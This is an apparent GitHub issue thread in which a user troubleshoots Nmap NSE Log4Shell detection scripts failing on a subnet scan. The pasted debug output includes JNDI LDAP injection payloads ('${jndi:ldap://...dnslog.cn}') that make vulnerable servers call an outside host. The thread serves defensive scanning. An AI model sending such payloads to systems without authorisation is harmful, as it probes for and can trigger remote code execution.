Diverto / nse-log4shell

Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
MIT License

Scanning of subnet with Zenmap #12

Open joelmjennings opened 2 years ago

joelmjennings commented 2 years ago

I am trying to scan a whole subnet. The single host works. It does the jndi ldap test. The scripts do not appear to run for the whole subnet. I do get one error.

On a Windows box I run the following command:

nmap -T4 -v -n --script http-log4shell,ssh-log4shell,imap-log4shell 10.41.251.0/24

|_ssh-log4shell: ERROR: Script execution failed (use -d to debug)

zer0init1 commented 2 years ago

Which version of nmap are you using? Does the error appear immediately or after a while?

joelmjennings commented 2 years ago

Zenmap 7.92

This is from one scan where some run and some do not. They fail or break immediately.

Bad one looks like

Nmap scan report for 10.41.12.59

|_http-log4shell: ERROR: Script execution failed (use -d to debug)

Good one looks like

Nmap scan report for 10.41.12.91

8000/tcp open http-alt

|_http-log4shell: Did not follow redirect to https://${jndi:ldap://10.41.12.91-8000.xxxx.dnslog.cn}/en-US/

*EDIT: I have some hosts that fail when it's a single IP as well, sorry, just re-tested on that.

NSE: Script scanning 10.41.12.59.

Initiating NSE at 09:07

Completed NSE at 09:07, 0.06s elapsed

Nmap scan report for 10.41.12.59

Host is up (0.0054s latency).

Not shown: 988 closed tcp ports (reset)

PORT STATE SERVICE

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

|_http-log4shell: ERROR: Script execution failed (use -d to debug)

445/tcp open microsoft-ds

1801/tcp open msmq

2103/tcp open zephyr-clt

2105/tcp open eklogin

2107/tcp open msmq-mgmt

3389/tcp open ms-wbt-server

7937/tcp open nsrexecd

7938/tcp open lgtomapper

joelmjennings commented 2 years ago

This is with -d

NSE: Starting http-log4shell against 10.41.12.59:443.

NSE: [http-log4shell 10.41.12.59:443] Final payload:${jndi:ldap://10.41.12.59-443.xxxx.dnslog.cn}

NSE: Starting http-log4shell against 10.41.12.59:80.

NSE: [http-log4shell 10.41.12.59:80] Final payload:${jndi:ldap://10.41.12.59-80.xxxx.dnslog.cn}

NSE: http-log4shell against 10.41.12.59:443 threw an error!

C:\Program Files (x86)\Nmap/scripts\http-log4shell.nse:107: attempt to index a nil value (field 'auth')

stack traceback:

C:\Program Files (x86)\Nmap/scripts\http-log4shell.nse:107: in function <C:\Program Files (x86)\Nmap/scripts\http-log4shell.nse:26>

(...tail calls...)

NSE: [http-log4shell 10.41.12.59:80] Path does not require authentication

NSE: Finished http-log4shell against 10.41.12.59:80.